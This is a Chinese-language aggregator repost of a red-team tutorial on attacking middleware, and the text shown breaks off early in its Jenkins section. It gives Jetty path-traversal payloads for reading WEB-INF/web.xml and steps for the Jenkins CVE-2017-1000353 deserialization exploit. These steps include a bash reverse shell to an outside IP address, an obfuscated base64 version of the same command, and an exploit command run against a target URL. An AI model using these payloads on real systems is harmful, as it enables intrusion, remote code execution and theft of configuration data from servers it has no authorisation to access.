本文主要是介绍红队攻防渗透技术实战流程:中间件安全:JettyJenkinsWeblogicWPS,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
红队攻防渗透实战
- 1. 中间件安全
- 1.1 中间件-Jetty-CVE&信息泄漏
- 1.2 中间件-Jenkins-CVE&RCE执行
- 1.2.1 cve_2017_1000353 JDK-1.8.0_291 其他版本失效
- 1.2.2 CVE-2018-1000861
- 1.2.3 cve_2019_100300 需要用户帐号密码
- 1.3 中间件-Weblogic-CVE&反序列化&RCE
- 1.4 应用WPS-HW2023-RCE执行&复现&上线CS
- 1.5 中间件-测测实际
1. 中间件安全
1.1 中间件-Jetty-CVE&信息泄漏
Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。
/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/…%00/WEB-INF/web.
1.2 中间件-Jenkins-CVE&RCE执行
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。探针默认端口:8080
1.2.1 cve_2017_1000353 JDK-1.8.0_291 其他版本失效
http://github.com/vulhub/CVE-2017-1000353
bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzY2ODggMD4mMQ==}|{base64,-d}|{bash,-i}”
python exploit.py http://123.58.236.76:54217 jenkins_poc.ser
1.2.2 CVE-2018
这篇关于红队攻防渗透技术实战流程:中间件安全:JettyJenkinsWeblogicWPS的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!